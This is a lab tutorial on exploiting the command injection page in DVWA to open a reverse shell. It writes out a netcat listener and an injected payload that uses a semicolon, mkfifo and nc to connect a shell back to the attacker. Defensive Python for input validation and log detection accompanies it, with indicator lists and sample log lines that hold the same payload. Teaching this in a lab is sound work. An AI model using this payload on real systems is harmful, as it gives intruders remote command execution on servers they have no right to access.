Hands-on mkfifo attack backdoor in DVWA via Command Injection
Hands-On: Creating a Backdoor via Command Injection in DVWA
Objective: Exploit the command injection vulnerability in DVWA to open a backdoor on the target system.
Prerequisites:
- DVWA is set up with security level "Low" on the target system.
- You have access to Kali Linux (or any other system with netcat).
- You know the IP address of your attack machine.
Note: This tutorial is for educational purposes only. Do not attempt on unauthorized systems.
Step 1: Understanding the Target
- Log in to DVWA with default credentials (username: `admin`, password: `password`).
- Navigate to Command Injection under the Vulnerabilities section.
- This page has a command injection vulnerability: the submitted value is inserted into an operating-system command and executed on the server without being sanitized.
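To make concrete what "not sanitized" means here, the following is an added Python example, not DVWA's own PHP code (DVWA passes the submitted `ip` value to a system ping command). It shows the vulnerable pattern beside a hardened one: an allow-list check that accepts only a literal IP address, and an argument vector executed without a shell, so separators such as `;` are never interpreted. The sample input `127.0.0.1; whoami` is constructed for the example and is only built into a string, never run.

```python
import ipaddress
import subprocess


def build_ping_vulnerable(target: str) -> str:
    """Vulnerable pattern (constructed): raw input pasted into a shell command line.
    Handed to a shell, a ';' or '|' inside `target` starts a second command."""
    return "ping -c 4 " + target


def validate_target(target: str) -> str:
    """Allow-list check: accept only a literal IPv4/IPv6 address, nothing else."""
    # ipaddress.ip_address raises ValueError for hostnames, blanks and any
    # string carrying shell metacharacters, so those never reach a command.
    return str(ipaddress.ip_address(target.strip()))


def is_rejected(target: str) -> bool:
    """True when the allow-list check refuses the value."""
    try:
        validate_target(target)
    except ValueError:
        return True
    return False


def build_ping_hardened(target: str) -> list:
    """Hardened pattern: the validated value is placed into an argv list, no shell string."""
    return ["ping", "-c", "4", validate_target(target)]


def run_ping_hardened(target: str) -> subprocess.CompletedProcess:
    """Execute the argv form. With shell=False (the default) the OS receives one
    program and its arguments; there is no shell to interpret separators."""
    return subprocess.run(build_ping_hardened(target), capture_output=True, text=True)


if __name__ == "__main__":
    payload = "127.0.0.1; whoami"  # constructed injection attempt, built into a string only
    print("vulnerable command line:", build_ping_vulnerable(payload))
    print("allow-list rejects it:", is_rejected(payload))
    print("hardened argv for a valid address:", build_ping_hardened("127.0.0.1"))
```

Both controls matter: the allow-list stops the separator from entering at all, and the argv form means that even a validation slip cannot turn a value into a second command.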
Step 2: Start a Netcat Listener on the Attacker Machine
To listen for incoming connections, set up a Netcat listener on your machine. Open a terminal in Kali Linux and run:
nc -lvp 4444
This command opens a listener on TCP port 4444 and waits for an incoming connection.
Step 3: Exploit Command Injection to Create a Backdoor
In DVWA's Command Injection input field, enter the following command:
<Your IP Address>; mkfifo /tmp/pipe; sh /tmp/pipe | nc <Your IP Address> 4444 > /tmp/pipe
- Replace `<Your IP Address>` with the IP of your attacker machine.
- This command:
  - Uses a semicolon `;` to end the intended ping command so that a second command follows it.
  - Creates a named pipe (`/tmp/pipe`) as the communication channel.
  - Starts `sh` reading its commands from `/tmp/pipe`, pipes the shell's output to `nc` (netcat), and writes whatever `nc` receives from the listener back into `/tmp/pipe`.
Step 4: Trigger the Backdoor
Click Submit to execute the command. If successful, the DVWA server connects to your Netcat listener, opening a reverse shell.
Step 5: Verify Shell Access
In the Kali terminal, you should see a connection from the DVWA server. You can now execute commands on the server as the `www-data` user:
whoami
uname -a
Step 6: Clean Up
When done, remove the pipe file to close the backdoor:
rm /tmp/pipe
Also delete any other files and stop any processes created during testing.
Analysis in Forensics
For forensic analysis, investigate:
- Logs in `/var/log/apache2` (or similar) for evidence of injected commands.
- Network activity for unusual external connections.
- File system changes, such as `/tmp/pipe` or unexpected scripts.
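The log and file-system checks above as working detection logic, in an added Python example that is not part of the original tutorial: it parses constructed Apache access log lines for the indicators of this technique (command separators, `mkfifo`, `nc`, `/tmp/pipe`) and scans a directory for named pipes. The log lines, client addresses and timestamps are constructed for the example. One caveat worth knowing: DVWA's form submits the `ip` field by POST, and the default access log records only the request line, so the payload is visible there only when the request is made as GET or a module such as ModSecurity's audit log captures request bodies; the sample lines therefore assume GET-style requests.

```python
import os
import re
import stat
import tempfile
from urllib.parse import parse_qsl, urlsplit

# Apache combined-format request line: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of the tutorial's technique: shell separators that let a second
# command follow the ping target, plus the tools and artefacts it relies on.
SEPARATORS = (";", "|", "&&", "||", "`", "$(")
KEYWORDS = ("mkfifo", "/tmp/pipe", "nc ", "netcat", "/dev/tcp")

# Constructed sample log lines for this example (addresses and times invented).
SAMPLE_LOG = [
    '10.0.0.9 - - [12/Mar/2024:10:14:03 +0000] "GET /vulnerabilities/exec/?ip=127.0.0.1&Submit=Submit HTTP/1.1" 200 4811 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Mar/2024:10:15:32 +0000] "GET /vulnerabilities/exec/?ip=127.0.0.1%3B+mkfifo+%2Ftmp%2Fpipe%3B+sh+%2Ftmp%2Fpipe+%7C+nc+10.0.0.5+4444+%3E+%2Ftmp%2Fpipe&Submit=Submit HTTP/1.1" 200 4790 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:16:10 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def indicators_in(value):
    """Return the separator and keyword indicators found in one parameter value."""
    return [s for s in SEPARATORS if s in value] + [k for k in KEYWORDS if k in value]


def scan_access_log(lines):
    """Decode each request's query parameters and flag values carrying indicators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m["target"])
        # parse_qsl undoes both %XX escapes and '+' for space, as the browser encoded them
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = indicators_in(value)
            if hits:
                findings.append({
                    "client": m["client"], "time": m["ts"], "path": parts.path,
                    "param": name, "value": value, "indicators": hits,
                })
    return findings


def find_fifos(directory):
    """List named pipes directly inside `directory` (the file-system artefact of the tutorial)."""
    found = []
    for entry in os.scandir(directory):
        try:
            st = os.lstat(entry.path)  # lstat: do not follow symlinks
        except OSError:
            continue
        if stat.S_ISFIFO(st.st_mode):
            found.append(entry.path)
    return sorted(found)


def fifo_scan_demo():
    """Build a throwaway directory holding one FIFO and one regular file; return what the scan flags."""
    with tempfile.TemporaryDirectory() as d:
        os.mkfifo(os.path.join(d, "pipe"))
        with open(os.path.join(d, "notes.txt"), "w") as fh:
            fh.write("regular file, must not be reported\n")
        return [os.path.basename(p) for p in find_fifos(d)]


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} param={f['param']} indicators={f['indicators']}")
    print("FIFOs found in demo directory:", fifo_scan_demo())
```

On a real host, `find_fifos("/tmp")` is the file-system half of the check; the network half is a live view rather than a log artefact, for example the web server user's established outbound connections in `ss -tnp`, which a log scanner cannot reconstruct after the fact.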
This exercise demonstrates how attackers might exploit web applications to gain unauthorized access. Proper security, like input sanitization and system monitoring, can help prevent such exploits.